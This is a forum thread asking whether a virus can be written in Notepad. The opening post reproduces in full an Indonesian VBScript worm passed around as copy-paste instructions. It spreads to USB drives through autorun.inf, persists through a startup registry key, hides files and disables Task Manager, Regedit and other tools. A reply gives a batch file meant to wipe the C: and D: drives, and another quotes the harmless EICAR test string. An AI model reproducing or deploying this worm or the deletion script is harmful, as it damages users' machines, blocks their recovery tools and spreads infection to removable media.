can we really make a virus on notepad?

hi, got this on indonesian forum (and it’s in indonesian languange too) :
the instruction is : just copy-paste this code to “notepad” and “save as”

'//–Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus–//
on error resume next

'//–Dim kata-kata berikut ini–//
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,sial,nt,check,sd

‘//–Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information–//
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe 51AL.doc.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

‘//–Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “\51AL.doc.vbs “)
tf.attributes = 32
set tf=fs.createtextfile(windowpath & “\51AL.doc.vbs”,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & “\51AL.doc.vbs “)
tf.attributes = 39

‘//–Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok–//
‘Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket
for each flashdrive in fs.drives
‘//–Cek Drive–//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then

‘//–Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\–//
set tf=fs.getfile(flashdrive.path &”\51AL.doc.vbs “)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\51AL.doc.vbs “,2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &”\51AL.doc.vbs “)
tf.attributes = 39

‘//–Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)–//
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next

‘//–Manipulasi Registry–//
set sial = createobject(”WScript.Shell”)
‘//–Manip - Ubah CAPTION Internet Explorer menjadi THE EMperOR of 51AL//
sial.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” THE EMperOR of 51AL “

‘//–Manip – Set agar file hidden tidak ditampilkan di Explorer–//
sial.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”,
“0″, “REG_DWORD”

‘//–Manip – Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager–//
sial.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
sial.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”,
“1″, “REG_DWORD”
sial.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
sial.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”,
“1″, “REG_DWORD”
sial.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”

‘//–Manip – Disable klik kanan–//
sial.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”,
“1″, “REG_DWORD”

‘//–Manip - Munculkan Pesan Setiap Windows Startup–//
sial.regwrite
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption”,
“THE EMperOR of 51AL.”
sial.regwrite
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText”,
“51AL datang…51AL lihat…51AL menang!!!”

‘//–Manip – Aktif setiap Windows Startup–//
sial.regwrite
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”,
windowpath & “\51AL.doc.vbs “

‘//–Manip – Ubah RegisteredOwner dan Organization–//
sial.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “The Emperor”
sial.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”51AL”

if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
‘Akhir dari Kode

??? ??? ??? ??? ??? can it be done? this is scary.

Ganda

And this is supposed to do what ?
thanks a lot for the great documentation …

i don’t know. the instruction is :
“if you wanna create a virus on notepad, it’s easy. just copy-paste this code (don’t forget to activate your AV, AVG can detect it, but mc afee didn’t)”.

and followed by the code… bla bla bla bla,

and last, “save as this code and name it something.vbs” (i forgot the exact name).

the actual code is too long, i think it’s automatically cut off in this post.

i think the code should b in English if ur OS is in English.

since the code is in Indonesian, I suppose the writer aim at Indonesian OS version or at least the OS which got installed Bahasa Indonesian.

Im blind in programming so just my 2c.

can we really make a virus on notepad?

Yep we can :P.
The easiest one is this one.

@echo off

DEL C: -Y
DEL D: -Y

Save this as ‘whateveryouwant’.bat

As you can see it just deletes your hard drive, it can be made more difficult etc so you cant see it, and it can be attached to thing etc but I’m not going to say more 'cous they’re going to think that I made that latest virus lol.
This is all I know of batmaking :-.

Hope I didn’t scare you to much lol
Xan

Hello,

Yes it is possible to create simple viruses in notepad or any text editor for that matter.

Justin

wow! i didn’t know that before. i’m not a techie but i’m really interested in virus/av programming, i’ve bought books about virus & antivirus programming, (haven’t read it yet), but they’re all about visual basic virus/AV programming.

WOW!!! i AM afraid.

and can this “simple text editor virus” be removed by our AV? or it’s classified as new virus (zero day)?

That is not a virus, it’s just a nasty bat-file .
also, the original example is actually a .vbs-script and you can write those
in any text-editor…but just because it does something nasty doesn’t necessarily make it a virus .

here’s a .txt “virus” …
(it doesn’t DO anything, read about it here : http://www.eicar.org/anti_virus_test_file.htm)

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

SCARIER!! if we can really attach it to another file, make it invisible, and it’s not categorized as a virus (AV can’t detects it) it freaks me!

Important note: EICAR cannot be held responsible when these files or your AV scanner in combination with these files cause any damage to your computer. YOU DOWNLOAD THESE FILES AT YOUR OWN RISK. Download these files only if you are sufficiently secure in the usage of your AV scanner. EICAR cannot and will not provide any help to remove these files from your computer. Please contact the manufacturer/vendor of your AV scanner to seek such help.

that scares me too ;D

Ganda

can it be done? this is scary.

WOW!!! i AM afraid.

SCARIER!! if we can really attach it to another file, make it invisible, and it's not categorized as a virus (AV can't detects it) it freaks me!

that scares me too

LOL looks like you’re ‘scaried’ ;D ;D ;D

LOL ;D ;D ;D

to the moderators :
could you please fix the board-software so it doesn’t mess with the formatting
of text that is in “code”-format ? f.ex you can not use the “@” symbol (see my point?)

Good that people are afraid … makes it easier for the AV-manufacturers to get
to your hard-earned cash …
The number one reason for virus-infections is still people double-clicking on
executable files originating from an evil source and/or using a m$ OS with the default settings .

Well, some of us did change it so you can use the at symbol, but I think the admins wanted to leave it this way to help prevent spambots from harvesting emails in the forum.

I think he means skipping that only for text within “code” BB tags, while leave it working otherwise.

I see. I would also like that, but I don’t know if even the admins can control that due to the SMF being maintained by another party. We can only hope (that and a slew of other forum requests) :THNK

Edit: I see that someone actually thought of a workaround to generate the [at-bypass] symbol :): you have to type [at-bypass ] → ignore the last space in there; it was put there ∴ the [at-bypass] wouldn’t be generated.

so…? how about the “text file virus”? can AV detects it?

Depends on the AV, but I’ve personally tried it before with just one line of text; the AV’s heuristics that I used at the time thought it was a real virus. 88)

and you set your AV heuristic on what level (high, low, middle?)

maximum everything

then i’ll do it too (:TNG). thx soya